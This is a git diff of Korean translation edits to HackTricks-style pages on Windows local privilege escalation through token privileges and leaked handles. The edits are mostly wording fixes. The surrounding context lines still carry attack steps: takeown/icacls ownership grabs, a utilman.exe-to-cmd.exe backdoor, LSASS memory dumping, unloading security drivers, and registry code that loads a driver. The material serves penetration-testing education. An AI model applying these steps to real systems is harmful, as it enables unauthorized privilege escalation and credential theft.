-**함수 `UpdateProcThreadAttribute`**가 **속성 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS`와 열린 권한 프로세스에 대한 핸들과 함께 사용되는 것을 주목하세요**. 이는 **생성된 프로세스 스레드가 \_cmd.exe**\_\*\*를 실행할 때 열린 핸들 프로세스와 동일한 토큰 권한을 가질 것임을 의미합니다\*\*.
+**함수 `UpdateProcThreadAttribute`**가 **속성 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS`와 열린 권한 프로세스에 대한 핸들과 함께 사용되는 것을 주목하십시오**. 이는 **생성된 프로세스 스레드가 \_cmd.exe**\_\*\*를 실행할 때 열린 핸들 프로세스와 동일한 토큰 권한을 가질 것임을 의미합니다\*\*.
 ```c
 #include <windows.h>
 #include <stdio.h>
@@ -599,7 +668,7 @@ Sleep(20000);
 return 0;
 }
 ```
-## 다른 도구 및 예제
+## 기타 도구 및 예제
 
 - [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md b/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
index 1f9448955..4f79cc09e 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
@@ -17,6 +17,6 @@
 
 (자신의 바이너리를 패킹하려고 하면 이러한 값을 수정할 수 있습니다)
 
-여기서 **다음 버튼**을 클릭하고 마지막 **빌드 버튼**을 클릭하면 설치 프로그램/래퍼가 생성됩니다.
+여기서 **다음 버튼**을 클릭하고 마지막 **빌드 버튼**을 클릭하면 설치 프로그램/래퍼가 생성됩니다. 
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
index e3ed550b5..de4a57c20 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
@@ -4,7 +4,7 @@
 
 ## 토큰
 
-Windows Access Tokens가 무엇인지 **모른다면** 계속하기 전에 이 페이지를 읽으세요:
+Windows Access Tokens가 무엇인지 **모른다면** 계속하기 전에 이 페이지를 읽어보세요:
 
 {{#ref}}
 access-tokens.md
@@ -26,7 +26,7 @@ juicypotato.md
 
 ### SeAssignPrimaryPrivilege
 
-**SeImpersonatePrivilege**와 매우 유사하며, 특권 토큰을 얻기 위해 **같은 방법**을 사용합니다.\
+이 권한은 **SeImpersonatePrivilege**와 매우 유사하며, 특권 토큰을 얻기 위해 **같은 방법**을 사용합니다.\
 그 후, 이 권한은 **새로운/중단된 프로세스에 기본 토큰을 할당**할 수 있게 해줍니다. 특권 임시 토큰을 사용하여 기본 토큰을 파생할 수 있습니다(DuplicateTokenEx).\
 이 토큰을 사용하여 'CreateProcessAsUser'로 **새 프로세스**를 생성하거나 중단된 프로세스를 생성하고 **토큰을 설정**할 수 있습니다(일반적으로 실행 중인 프로세스의 기본 토큰을 수정할 수는 없습니다).
 
@@ -36,7 +36,7 @@ juicypotato.md
 
 ### SeBackupPrivilege
 
-이 권한에 의해 시스템은 모든 파일에 대한 **읽기 접근** 제어를 부여받습니다(읽기 작업에 한정됨). 이는 레지스트리에서 로컬 관리자 계정의 비밀번호 해시를 **읽는 데** 사용되며, 이후 "**psexec**" 또는 "**wmiexec**"와 같은 도구를 해시와 함께 사용할 수 있습니다(패스-더-해시 기법). 그러나 이 기법은 두 가지 조건에서 실패합니다: 로컬 관리자 계정이 비활성화되어 있거나, 원격으로 연결하는 로컬 관리자에게 관리 권한을 제거하는 정책이 시행될 때입니다.\
+이 권한에 의해 시스템은 모든 파일에 대한 **읽기 접근** 제어를 부여받습니다(읽기 작업에 한정됨). 이는 레지스트리에서 로컬 관리자 계정의 비밀번호 해시를 **읽기 위해** 사용되며, 이후 "**psexec**" 또는 "**wmiexec**"와 같은 도구를 해시와 함께 사용할 수 있습니다(패스-더-해시 기법). 그러나 이 기법은 두 가지 조건에서 실패합니다: 로컬 관리자 계정이 비활성화되어 있거나, 원격으로 연결하는 로컬 관리자에게 관리 권한을 제거하는 정책이 시행될 때입니다.\
 이 권한을 **악용할 수 있습니다**:
 
 - [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1)
@@ -50,13 +50,13 @@ juicypotato.md
 
 ### SeRestorePrivilege
 
-이 권한은 파일의 접근 제어 목록(ACL)에 관계없이 모든 시스템 파일에 대한 **쓰기 접근**을 제공합니다. 이는 서비스 **수정**, DLL 하이재킹 수행, 이미지 파일 실행 옵션을 통한 **디버거** 설정 등 다양한 상승 가능성을 열어줍니다.
+이 권한은 파일의 접근 제어 목록(ACL)에 관계없이 모든 시스템 파일에 대한 **쓰기 접근**을 제공합니다. 이는 서비스 수정, DLL 하이재킹, 이미지 파일 실행 옵션을 통한 **디버거** 설정 등 다양한 권한 상승 가능성을 열어줍니다.
 
 ### SeCreateTokenPrivilege
 
 SeCreateTokenPrivilege는 강력한 권한으로, 사용자가 토큰을 임시로 사용할 수 있는 능력을 가질 때 특히 유용하지만, SeImpersonatePrivilege가 없는 경우에도 유용합니다. 이 기능은 동일한 사용자를 나타내는 토큰을 임시로 사용할 수 있는 능력에 의존하며, 이 토큰의 무결성 수준이 현재 프로세스의 무결성 수준을 초과하지 않아야 합니다.
 
-**핵심 사항:**
+**주요 사항:**
 
 - **SeImpersonatePrivilege 없이 임시 사용:** 특정 조건에서 토큰을 임시로 사용하여 EoP를 위해 SeCreateTokenPrivilege를 활용할 수 있습니다.
 - **토큰 임시 사용 조건:** 성공적인 임시 사용은 대상 토큰이 동일한 사용자에 속하고, 임시 사용을 시도하는 프로세스의 무결성 수준보다 낮거나 같은 무결성 수준을 가져야 합니다.
@@ -64,19 +64,19 @@ SeCreateTokenPrivilege는 강력한 권한으로, 사용자가 토큰을 임시
 
 ### SeLoadDriverPrivilege
 
-이 권한은 특정 값으로 `ImagePath` 및 `Type`을 가진 레지스트리 항목을 생성하여 **장치 드라이버를 로드하고 언로드**할 수 있게 해줍니다. `HKLM` (HKEY_LOCAL_MACHINE)에 대한 직접 쓰기 접근이 제한되므로 대신 `HKCU` (HKEY_CURRENT_USER)를 사용해야 합니다. 그러나 드라이버 구성을 위해 `HKCU`를 커널이 인식할 수 있도록 하려면 특정 경로를 따라야 합니다.
+이 권한은 특정 값으로 `ImagePath`와 `Type`을 가진 레지스트리 항목을 생성하여 **장치 드라이버를 로드하고 언로드**할 수 있게 해줍니다. `HKLM`(HKEY_LOCAL_MACHINE)에 대한 직접 쓰기 접근이 제한되므로 대신 `HKCU`(HKEY_CURRENT_USER)를 사용해야 합니다. 그러나 드라이버 구성을 위해 `HKCU`를 커널이 인식할 수 있도록 하려면 특정 경로를 따라야 합니다.
 
-이 경로는 `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`이며, 여기서 `<RID>`는 현재 사용자의 상대 식별자입니다. `HKCU` 내에서 이 전체 경로를 생성하고 두 값을 설정해야 합니다:
+이 경로는 `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`이며, 여기서 `<RID>`는 현재 사용자의 상대 식별자입니다. `HKCU` 내에서 이 전체 경로를 생성하고 두 가지 값을 설정해야 합니다:
 
 - `ImagePath`, 실행할 이진 파일의 경로
-- `Type`, 값은 `SERVICE_KERNEL_DRIVER` (`0x00000001`).
+- `Type`, 값은 `SERVICE_KERNEL_DRIVER`(`0x00000001`).
 
 **따라야 할 단계:**
 
 1. 제한된 쓰기 접근으로 인해 `HKLM` 대신 `HKCU`에 접근합니다.
 2. `HKCU` 내에 `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName` 경로를 생성합니다. 여기서 `<RID>`는 현재 사용자의 상대 식별자를 나타냅니다.
 3. `ImagePath`를 이진 파일의 실행 경로로 설정합니다.
-4. `Type`을 `SERVICE_KERNEL_DRIVER` (`0x00000001`)로 할당합니다.
+4. `Type`을 `SERVICE_KERNEL_DRIVER`(`0x00000001`)로 할당합니다.
 ```python
 # Example Python code to set the registry values
 import winreg as reg
@@ -92,7 +92,7 @@ reg.CloseKey(key)
 
 ### SeTakeOwnershipPrivilege
 
-이는 **SeRestorePrivilege**와 유사합니다. 이 특권의 주요 기능은 프로세스가 **객체의 소유권을 가정**할 수 있도록 하여 WRITE_OWNER 접근 권한을 제공함으로써 명시적인 재량적 접근 요구 사항을 우회하는 것입니다. 이 과정은 먼저 쓰기 목적으로 의도된 레지스트리 키의 소유권을 확보한 다음, 쓰기 작업을 가능하게 하기 위해 DACL을 변경하는 것을 포함합니다.
+이는 **SeRestorePrivilege**와 유사합니다. 이 특권의 주요 기능은 프로세스가 **객체의 소유권을 가정할 수 있도록** 하여 WRITE_OWNER 접근 권한을 제공함으로써 명시적인 재량적 접근 요구 사항을 우회하는 것입니다. 이 과정은 먼저 쓰기 목적으로 의도된 레지스트리 키의 소유권을 확보한 다음, 쓰기 작업을 가능하게 하기 위해 DACL을 변경하는 것을 포함합니다.
 ```bash
 takeown /f 'C:\some\file.txt' #Now the file is owned by you
 icacls 'C:\some\file.txt' /grant <your_username>:F #Now you have full access
@@ -112,7 +112,7 @@ c:\inetpub\wwwwroot\web.config
 
 이 권한은 **다른 프로세스를 디버그**할 수 있게 하며, 메모리에서 읽고 쓸 수 있습니다. 대부분의 안티바이러스 및 호스트 침입 방지 솔루션을 회피할 수 있는 다양한 메모리 주입 전략을 이 권한으로 사용할 수 있습니다.
 
-#### 메모리 덤프
+#### Dump memory
 
 [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)를 [SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)에서 사용하여 **프로세스의 메모리를 캡처**할 수 있습니다. 특히, 이는 사용자가 시스템에 성공적으로 로그인한 후 사용자 자격 증명을 저장하는 **로컬 보안 권한 하위 시스템 서비스 (**[**LSASS**](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)**)** 프로세스에 적용될 수 있습니다.
 
@@ -155,14 +155,14 @@ whoami /priv
 
 | 권한                       | 영향        | 도구                    | 실행 경로                                                                                                                                                                                                                                                                                                                                     | 비고                                                                                                                                                                                                                                                                                                                        |
 | -------------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
-| **`SeAssignPrimaryToken`** | _**관리자**_ | 3rd party tool          | _"사용자가 토큰을 가장하고 potato.exe, rottenpotato.exe 및 juicypotato.exe와 같은 도구를 사용하여 nt 시스템으로 권한 상승을 허용합니다."_                                                                                                                                                                                                      | 업데이트에 대해 [Aurélien Chalot](https://twitter.com/Defte_)에게 감사드립니다. 더 요리법 같은 것으로 다시 표현해 보겠습니다.                                                                                                                                                                                         |
-| **`SeBackup`**             | **위협**    | _**내장 명령**_        | `robocopy /b`로 민감한 파일 읽기                                                                                                                                                                                                                                                                                                             | <p>- %WINDIR%\MEMORY.DMP를 읽을 수 있다면 더 흥미로울 수 있습니다.<br><br>- <code>SeBackupPrivilege</code> (및 robocopy)는 열린 파일에 대해서는 도움이 되지 않습니다.<br><br>- Robocopy는 /b 매개변수로 작동하려면 SeBackup과 SeRestore가 모두 필요합니다.</p>                                                                      |
+| **`SeAssignPrimaryToken`** | _**관리자**_ | 3rd party tool          | _"사용자가 토큰을 가장하고 potato.exe, rottenpotato.exe 및 juicypotato.exe와 같은 도구를 사용하여 nt 시스템으로 권한 상승을 허용합니다."_                                                                                                                                                                                                      | 업데이트해 주신 [Aurélien Chalot](https://twitter.com/Defte_)에게 감사드립니다. 곧 더 레시피 같은 것으로 다시 표현해 보겠습니다.                                                                                                                                                                                         |
+| **`SeBackup`**             | **위협**    | _**내장 명령**_         | `robocopy /b`로 민감한 파일 읽기                                                                                                                                                                                                                                                                                                             | <p>- %WINDIR%\MEMORY.DMP를 읽을 수 있다면 더 흥미로울 수 있습니다.<br><br>- <code>SeBackupPrivilege</code> (및 robocopy)는 열린 파일에 대해서는 도움이 되지 않습니다.<br><br>- Robocopy는 /b 매개변수로 작동하려면 SeBackup과 SeRestore가 모두 필요합니다.</p>                                                                      |
 | **`SeCreateToken`**        | _**관리자**_ | 3rd party tool          | `NtCreateToken`으로 임의의 토큰 생성, 로컬 관리자 권한 포함.                                                                                                                                                                                                                                                                          |                                                                                                                                                                                                                                                                                                                                |
 | **`SeDebug`**              | _**관리자**_ | **PowerShell**          | `lsass.exe` 토큰 복제.                                                                                                                                                                                                                                                                                                                   | [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1)에서 스크립트를 찾을 수 있습니다.                                                                                                                                                                                                         |
 | **`SeLoadDriver`**         | _**관리자**_ | 3rd party tool          | <p>1. <code>szkg64.sys</code>와 같은 결함이 있는 커널 드라이버 로드<br>2. 드라이버 취약점 악용<br><br>또는 이 권한을 사용하여 <code>ftlMC</code> 내장 명령으로 보안 관련 드라이버를 언로드할 수 있습니다. 예: <code>fltMC sysmondrv</code></p>                                                                           | <p>1. <code>szkg64</code> 취약점은 <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732">CVE-2018-15732</a>로 나열되어 있습니다.<br>2. <code>szkg64</code> <a href="https://www.greyhathacker.net/?p=1025">악용 코드</a>는 <a href="https://twitter.com/parvezghh">Parvez Anwar</a>에 의해 작성되었습니다.</p> |
 | **`SeRestore`**            | _**관리자**_ | **PowerShell**          | <p>1. SeRestore 권한이 있는 상태에서 PowerShell/ISE 실행.<br>2. <a href="https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1">Enable-SeRestorePrivilege</a>로 권한 활성화.<br>3. utilman.exe를 utilman.old로 이름 변경<br>4. cmd.exe를 utilman.exe로 이름 변경<br>5. 콘솔 잠그고 Win+U 누르기</p> | <p>일부 AV 소프트웨어에서 공격이 감지될 수 있습니다.</p><p>대체 방법은 동일한 권한을 사용하여 "Program Files"에 저장된 서비스 바이너리를 교체하는 것입니다.</p>                                                                                                                                                            |
-| **`SeTakeOwnership`**      | _**관리자**_ | _**내장 명령**_        | <p>1. <code>takeown.exe /f "%windir%\system32"</code><br>2. <code>icalcs.exe "%windir%\system32" /grant "%username%":F</code><br>3. cmd.exe를 utilman.exe로 이름 변경<br>4. 콘솔 잠그고 Win+U 누르기</p>                                                                                                                                       | <p>일부 AV 소프트웨어에서 공격이 감지될 수 있습니다.</p><p>대체 방법은 동일한 권한을 사용하여 "Program Files"에 저장된 서비스 바이너리를 교체하는 것입니다.</p>                                                                                                                                                           |
-| **`SeTcb`**                | _**관리자**_ | 3rd party tool          | <p>토큰을 조작하여 로컬 관리자 권한을 포함하도록 합니다. SeImpersonate가 필요할 수 있습니다.</p><p>확인 필요.</p>                                                                                                                                                                                                                                     |                                                                                                                                                                                                                                                                                                                                |
+| **`SeTakeOwnership`**      | _**관리자**_ | _**내장 명령**_         | <p>1. <code>takeown.exe /f "%windir%\system32"</code><br>2. <code>icalcs.exe "%windir%\system32" /grant "%username%":F</code><br>3. cmd.exe를 utilman.exe로 이름 변경<br>4. 콘솔 잠그고 Win+U 누르기</p>                                                                                                                                       | <p>일부 AV 소프트웨어에서 공격이 감지될 수 있습니다.</p><p>대체 방법은 동일한 권한을 사용하여 "Program Files"에 저장된 서비스 바이너리를 교체하는 것입니다.</p>                                                                                                                                                           |
+| **`SeTcb`**                | _**관리자**_ | 3rd party tool          | <p>토큰을 조작하여 로컬 관리자 권한 포함. SeImpersonate가 필요할 수 있습니다.</p><p>확인 필요.</p>                                                                                                                                                                                                                                     |                                                                                                                                                                                                                                                                                                                                |
 
 ## 참고
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
index 258775de2..1b52b4b18 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
@@ -4,7 +4,7 @@
 
 ## 토큰
 
-Windows Access Tokens에 대해 **모른다면** 계속하기 전에 이 페이지를 읽으세요:
+Windows Access Tokens에 대해 **모른다면** 계속하기 전에 이 페이지를 읽어보세요:
 
 {{#ref}}
 ../access-tokens.md
@@ -27,22 +27,22 @@ Windows Access Tokens에 대해 **모른다면** 계속하기 전에 이 페이
 ### SeAssignPrimaryPrivilege
 
 이 권한은 **SeImpersonatePrivilege**와 매우 유사하며, 특권 토큰을 얻기 위해 **같은 방법**을 사용합니다.\
-그 후, 이 권한은 **새로운/중단된 프로세스에 기본 토큰을 할당**할 수 있도록 허용합니다. 특권 임시 토큰을 사용하여 기본 토큰을 파생할 수 있습니다(DuplicateTokenEx).\
+그 후, 이 권한은 **새로운/중단된 프로세스에 기본 토큰을 할당**할 수 있도록 허용합니다. 특권 임시 토큰을 사용하여 기본 토큰을 파생시킬 수 있습니다(DuplicateTokenEx).\
 이 토큰을 사용하여 'CreateProcessAsUser'로 **새 프로세스**를 생성하거나 중단된 프로세스를 생성하고 **토큰을 설정**할 수 있습니다(일반적으로 실행 중인 프로세스의 기본 토큰을 수정할 수는 없습니다).
 
 ### SeTcbPrivilege
 
-이 토큰이 활성화되어 있으면 **KERB_S4U_LOGON**을 사용하여 자격 증명 없이 다른 사용자의 **임시 토큰**을 얻을 수 있으며, **임의의 그룹**(관리자)을 토큰에 추가하고, 토큰의 **무결성 수준**을 "**중간**"으로 설정하고, 이 토큰을 **현재 스레드**에 할당할 수 있습니다(SetThreadToken).
+이 토큰이 활성화되어 있으면 **KERB_S4U_LOGON**을 사용하여 자격 증명 없이 다른 사용자에 대한 **임시 토큰**을 얻을 수 있으며, **임의의 그룹**(관리자)을 토큰에 추가하고, 토큰의 **무결성 수준**을 "**중간**"으로 설정하고, 이 토큰을 **현재 스레드**에 할당할 수 있습니다(SetThreadToken).
 
 ### SeBackupPrivilege
 
-이 권한에 의해 시스템은 모든 파일에 대한 **읽기 접근** 제어를 부여합니다(읽기 작업으로 제한됨). 이는 레지스트리에서 로컬 관리자 계정의 비밀번호 해시를 **읽는 데** 사용되며, 이후 "**psexec**" 또는 "**wmiexec**"와 같은 도구를 해시와 함께 사용할 수 있습니다(패스-더-해시 기법). 그러나 이 기법은 두 가지 조건에서 실패합니다: 로컬 관리자 계정이 비활성화되어 있거나, 원격으로 연결하는 로컬 관리자에게 관리 권한을 제거하는 정책이 시행될 때입니다.\
+이 권한에 의해 시스템은 모든 파일에 대한 **읽기 접근** 제어를 부여합니다(읽기 작업으로 제한됨). 이는 레지스트리에서 로컬 관리자 계정의 비밀번호 해시를 **읽기 위해** 사용되며, 이후 "**psexec**" 또는 "**wmiexec**"와 같은 도구를 해시와 함께 사용할 수 있습니다(패스-더-해시 기법). 그러나 이 기법은 두 가지 조건에서 실패합니다: 로컬 관리자 계정이 비활성화되어 있거나, 원격으로 연결하는 로컬 관리자에게 관리 권한을 제거하는 정책이 시행될 때입니다.\
 이 권한을 **악용할 수 있습니다**:
 
 - [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1)
 - [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug)
 - [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610&ab_channel=IppSec)에서 **IppSec**를 따르기
-- 또는 다음의 **백업 운영자로서 권한 상승** 섹션에서 설명된 대로:
+- 또는 다음의 **백업 운영자를 통한 권한 상승** 섹션에서 설명된 대로:
 
 {{#ref}}
 ../../active-directory-methodology/privileged-groups-and-token-privileges.md
@@ -50,11 +50,11 @@ Windows Access Tokens에 대해 **모른다면** 계속하기 전에 이 페이
 
 ### SeRestorePrivilege
 
-이 권한은 파일의 접근 제어 목록(ACL)에 관계없이 모든 시스템 파일에 대한 **쓰기 접근**을 허용합니다. 이는 서비스 수정, DLL 하이재킹 및 이미지 파일 실행 옵션을 통한 **디버거** 설정 등 다양한 상승 가능성을 열어줍니다.
+이 권한은 파일의 접근 제어 목록(ACL)에 관계없이 모든 시스템 파일에 대한 **쓰기 접근**을 제공합니다. 이는 서비스 수정, DLL 하이재킹 및 이미지 파일 실행 옵션을 통한 **디버거** 설정 등 다양한 상승 가능성을 열어줍니다.
 
 ### SeCreateTokenPrivilege
 
-SeCreateTokenPrivilege는 강력한 권한으로, 사용자가 토큰을 임시로 사용할 수 있는 능력을 가질 때 특히 유용하지만 SeImpersonatePrivilege가 없는 경우에도 유용합니다. 이 기능은 동일한 사용자를 나타내는 토큰을 임시로 사용할 수 있는 능력에 의존하며, 해당 토큰의 무결성 수준이 현재 프로세스의 무결성 수준을 초과하지 않아야 합니다.
+SeCreateTokenPrivilege는 강력한 권한으로, 사용자가 토큰을 임시로 사용할 수 있는 능력을 가질 때 특히 유용하지만, SeImpersonatePrivilege가 없는 경우에도 유용합니다. 이 기능은 동일한 사용자를 나타내는 토큰을 임시로 사용할 수 있는 능력에 의존하며, 해당 토큰의 무결성 수준이 현재 프로세스의 무결성 수준을 초과하지 않아야 합니다.
 
 **주요 사항:**
 
@@ -64,18 +64,18 @@ SeCreateTokenPrivilege는 강력한 권한으로, 사용자가 토큰을 임시
 
 ### SeLoadDriverPrivilege
 
-이 권한은 특정 값으로 `ImagePath` 및 `Type`을 가진 레지스트리 항목을 생성하여 **장치 드라이버를 로드 및 언로드**할 수 있도록 허용합니다. `HKLM`(HKEY_LOCAL_MACHINE)에 대한 직접 쓰기 접근이 제한되므로 대신 `HKCU`(HKEY_CURRENT_USER)를 사용해야 합니다. 그러나 드라이버 구성을 위해 `HKCU`를 커널이 인식할 수 있도록 하려면 특정 경로를 따라야 합니다.
+이 권한은 특정 값으로 `ImagePath` 및 `Type`을 가진 레지스트리 항목을 생성하여 **장치 드라이버를 로드하고 언로드**할 수 있도록 허용합니다. `HKLM`(HKEY_LOCAL_MACHINE)에 대한 직접 쓰기 접근이 제한되므로 대신 `HKCU`(HKEY_CURRENT_USER)를 사용해야 합니다. 그러나 드라이버 구성을 위해 `HKCU`를 커널이 인식하도록 하려면 특정 경로를 따라야 합니다.
 
 이 경로는 `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`이며, 여기서 `<RID>`는 현재 사용자의 상대 식별자입니다. `HKCU` 내에서 이 전체 경로를 생성하고 두 값을 설정해야 합니다:
 
-- `ImagePath`, 실행할 이진 파일의 경로
+- `ImagePath`, 실행할 바이너리의 경로
 - `Type`, 값은 `SERVICE_KERNEL_DRIVER`(`0x00000001`).
 
 **따라야 할 단계:**
 
 1. 제한된 쓰기 접근으로 인해 `HKLM` 대신 `HKCU`에 접근합니다.
 2. `HKCU` 내에 `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName` 경로를 생성합니다. 여기서 `<RID>`는 현재 사용자의 상대 식별자를 나타냅니다.
-3. `ImagePath`를 이진 파일의 실행 경로로 설정합니다.
+3. `ImagePath`를 바이너리의 실행 경로로 설정합니다.
 4. `Type`을 `SERVICE_KERNEL_DRIVER`(`0x00000001`)로 할당합니다.
 ```python
 # Example Python code to set the registry values
@@ -92,7 +92,7 @@ reg.CloseKey(key)
 
 ### SeTakeOwnershipPrivilege
 
-이는 **SeRestorePrivilege**와 유사합니다. 이 특권의 주요 기능은 프로세스가 **객체의 소유권을 가정**할 수 있도록 하여 WRITE_OWNER 접근 권한을 제공함으로써 명시적인 재량적 접근 요구 사항을 우회하는 것입니다. 이 과정은 먼저 쓰기 목적으로 의도된 레지스트리 키의 소유권을 확보한 다음, 쓰기 작업을 가능하게 하기 위해 DACL을 변경하는 것을 포함합니다.
+이는 **SeRestorePrivilege**와 유사합니다. 이 특권의 주요 기능은 프로세스가 **객체의 소유권을 가정할 수 있도록** 하여 WRITE_OWNER 접근 권한을 제공함으로써 명시적인 재량적 접근 요구 사항을 우회하는 것입니다. 이 과정은 먼저 쓰기 목적으로 의도된 레지스트리 키의 소유권을 확보한 다음, 쓰기 작업을 가능하게 하기 위해 DACL을 변경하는 것을 포함합니다.
 ```bash
 takeown /f 'C:\some\file.txt' #Now the file is owned by you
 icacls 'C:\some\file.txt' /grant <your_username>:F #Now you have full access
@@ -110,7 +110,7 @@ c:\inetpub\wwwwroot\web.config
 ```
 ### SeDebugPrivilege
 
-이 권한은 **다른 프로세스를 디버그**할 수 있도록 허용하며, 메모리에서 읽고 쓸 수 있습니다. 대부분의 안티바이러스 및 호스트 침입 방지 솔루션을 회피할 수 있는 다양한 메모리 주입 전략을 이 권한으로 사용할 수 있습니다.
+이 권한은 **다른 프로세스를 디버그**할 수 있도록 허용하며, 메모리에서 읽고 쓸 수 있습니다. 대부분의 안티바이러스 및 호스트 침입 방지 솔루션을 회피할 수 있는 메모리 주입을 위한 다양한 전략을 이 권한으로 사용할 수 있습니다.
 
 #### 메모리 덤프
 
@@ -136,7 +136,7 @@ import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<c
 ```
 ### SeManageVolumePrivilege
 
-`SeManageVolumePrivilege`는 사용자가 디스크 볼륨을 관리할 수 있도록 허용하는 Windows 사용자 권한으로, 볼륨을 생성하고 삭제하는 것을 포함합니다. 관리자를 위해 설계되었지만, 비관리자 사용자에게 부여될 경우 권한 상승을 위해 악용될 수 있습니다.
+`SeManageVolumePrivilege`는 사용자가 디스크 볼륨을 관리할 수 있도록 허용하는 Windows 사용자 권한으로, 볼륨을 생성하고 삭제하는 것을 포함합니다. 관리자를 위해 설계되었지만, 비관리자 사용자에게 부여될 경우 권한 상승에 악용될 수 있습니다.
 
 이 권한을 활용하여 볼륨을 조작할 수 있으며, 이는 전체 볼륨 접근으로 이어질 수 있습니다. [SeManageVolumeExploit](https://github.com/CsEnox/SeManageVolumeExploit)를 사용하여 C:\에 대한 모든 사용자에게 전체 접근 권한을 부여할 수 있습니다.
 
@@ -165,11 +165,11 @@ whoami /priv
 | -------------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
 | **`SeAssignPrimaryToken`** | _**관리자**_ | 3rd party tool          | _"사용자가 토큰을 가장하고 potato.exe, rottenpotato.exe 및 juicypotato.exe와 같은 도구를 사용하여 nt 시스템으로 권한 상승을 허용합니다."_                                                                                                                                                                                                      | 업데이트해 주신 [Aurélien Chalot](https://twitter.com/Defte_)에게 감사드립니다. 곧 더 레시피 같은 것으로 다시 표현해 보겠습니다.                                                                                                                                                                                         |
 | **`SeBackup`**             | **위협**    | _**내장 명령**_        | `robocopy /b`로 민감한 파일 읽기                                                                                                                                                                                                                                                                                                             | <p>- %WINDIR%\MEMORY.DMP를 읽을 수 있다면 더 흥미로울 수 있습니다.<br><br>- <code>SeBackupPrivilege</code> (및 robocopy)는 열린 파일에 대해서는 도움이 되지 않습니다.<br><br>- Robocopy는 /b 매개변수로 작동하려면 SeBackup과 SeRestore가 모두 필요합니다.</p>                                                                      |
-| **`SeCreateToken`**        | _**관리자**_ | 3rd party tool          | `NtCreateToken`으로 임의의 토큰 생성, 로컬 관리자 권한 포함.                                                                                                                                                                                                                                                                          |                                                                                                                                                                                                                                                                                                                                |
-| **`SeDebug`**              | _**관리자**_ | **PowerShell**          | `lsass.exe` 토큰 복제.                                                                                                                                                                                                                                                                                                                   | 스크립트는 [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1)에서 찾을 수 있습니다.                                                                                                                                                                                                         |
-| **`SeLoadDriver`**         | _**관리자**_ | 3rd party tool          | <p>1. <code>szkg64.sys</code>와 같은 결함이 있는 커널 드라이버 로드<br>2. 드라이버 취약점 악용<br><br>또는 이 권한을 사용하여 <code>ftlMC</code> 내장 명령으로 보안 관련 드라이버를 언로드할 수 있습니다. 예: <code>fltMC sysmondrv</code></p>                                                                           | <p>1. <code>szkg64</code> 취약점은 <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732">CVE-2018-15732</a>로 나열되어 있습니다.<br>2. <code>szkg64</code> <a href="https://www.greyhathacker.net/?p=1025">악용 코드</a>는 <a href="https://twitter.com/parvezghh">Parvez Anwar</a>에 의해 작성되었습니다.</p> |
-| **`SeRestore`**            | _**관리자**_ | **PowerShell**          | <p>1. SeRestore 권한이 있는 상태에서 PowerShell/ISE 실행.<br>2. <a href="https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1">Enable-SeRestorePrivilege</a>로 권한 활성화.<br>3. utilman.exe를 utilman.old로 이름 변경<br>4. cmd.exe를 utilman.exe로 이름 변경<br>5. 콘솔을 잠그고 Win+U를 누릅니다.</p> | <p>일부 AV 소프트웨어에 의해 공격이 감지될 수 있습니다.</p><p>대체 방법은 동일한 권한을 사용하여 "Program Files"에 저장된 서비스 바이너리를 교체하는 것입니다.</p>                                                                                                                                                            |
